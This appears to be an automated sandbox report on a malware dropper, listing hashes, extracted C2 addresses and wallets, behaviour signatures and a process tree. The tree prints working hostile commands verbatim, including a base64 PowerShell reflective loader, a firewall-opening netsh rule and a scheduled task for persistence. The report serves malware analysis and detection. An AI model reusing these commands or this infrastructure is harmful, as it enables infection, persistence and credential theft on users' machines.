Resubmissions
09-04-2024 08:32
240409-kfg77aaf85 1009-04-2024 08:32
240409-kfglnaaf84 1009-04-2024 08:32
240409-kffz5aea2y 1009-04-2024 08:32
240409-kffpcsaf79 1011-03-2024 08:03
240311-jxm94afe6y 1010-03-2024 15:15
240310-snee9sfd3y 10Analysis
-
max time kernel
257s -
max time network
415s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
09-04-2024 08:32
Errors
General
-
Target
FUCKER.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66/
0xAa3ea4838e8E3F6a1922c6B67E3cD6efD1ff175b
THRUoPK7oYqF7YyKZJvPYwTH35JsPZVPto
1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6
qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut
XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL
LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX
rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH
ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ
48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg
3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC
3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3
D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH
t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn
bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd
bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg
bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut
GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE
Extracted
redline
cheat
91.198.77.158:4483
Extracted
amadey
4.18
http://185.172.128.3
-
install_dir
One_Dragon_Center
-
install_file
MSI.CentralServer.exe
-
strings_key
fd2f5851d3165c210396dcbe9930d294
-
url_paths
/QajE3OBS/index.php
Extracted
risepro
193.233.132.11:50500
Extracted
vidar
8.6
72f54d93118188013f2386eef7e5cc05
https://steamcommunity.com/profiles/76561199658817715
https://t.me/sa9ok
-
profile_id_v2
72f54d93118188013f2386eef7e5cc05
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect Vidar Stealer 1 IoCs
-
Detect ZGRat V1 3 IoCs
-
Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
-
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
-
Raccoon Stealer V2 payload 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
-
SectopRAT payload 2 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs 18 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Async RAT payload 1 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 34 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 21 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 42 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Windows directory 7 IoCs
-
Detects Pyinstaller 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 16727⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe"C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\s1.exe"C:\Users\Admin\AppData\Local\Temp\Files\s1.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\96513172.exeC:\Users\Admin\AppData\Local\Temp\96513172.exe3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: SetClipboardViewer
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3276515002.exeC:\Users\Admin\AppData\Local\Temp\3276515002.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\248483651.exeC:\Users\Admin\AppData\Local\Temp\248483651.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\192706194.exeC:\Users\Admin\AppData\Local\Temp\192706194.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2837029563.exeC:\Users\Admin\AppData\Local\Temp\2837029563.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3006430217.exeC:\Users\Admin\AppData\Local\Temp\3006430217.exe3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\2595526574.exeC:\Users\Admin\AppData\Local\Temp\2595526574.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2476721870.exeC:\Users\Admin\AppData\Local\Temp\2476721870.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /r4⤵
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r5⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\ISetup3.exe"C:\Users\Admin\AppData\Local\Temp\Files\ISetup3.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe"C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe6⤵
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30007⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 25804⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe"C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 11883⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe"C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exeC:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted_15a94542.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted_15a94542.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\Files\test2.exe"C:\Users\Admin\AppData\Local\Temp\Files\test2.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe"C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe"C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\Dolzkqnsbh.exe"C:\Users\Admin\AppData\Local\Temp\Files\Dolzkqnsbh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe"C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 7923⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2448 -ip 24481⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:31⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3448 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:81⤵
-
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exeC:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 404 -ip 4041⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4a0 0x4a41⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5032 -ip 50321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5508 -ip 55081⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa390d855 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
4Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
